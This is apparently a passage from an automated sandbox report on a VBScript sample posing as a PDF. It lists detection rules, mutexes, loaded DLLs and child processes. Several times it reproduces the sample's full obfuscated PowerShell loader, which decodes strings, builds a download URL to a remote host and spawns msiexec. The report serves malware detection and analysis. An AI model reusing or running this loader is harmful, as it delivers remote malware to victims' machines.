r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBolJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C817BF463_2_00007FF7C817BF46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C817CCF23_2_00007FF7C817CCF2
              Source: Document BT24#U00b7pdf.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6522
              Source: unknownProcess created: Commandline size = 6522
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6522Jump to behavior
              Source: amsi64_7624.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_2112.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@12/7@3/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Unapplauding.OveJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EOQLI8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y10yx4od.fuf.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7624
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2112
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Document BT24#U00b7pdf.vbsVirustotal: Detection: 14%
              Source: Document BT24#U00b7pdf.vbsReversingLabs: Detection: 18%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBolJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
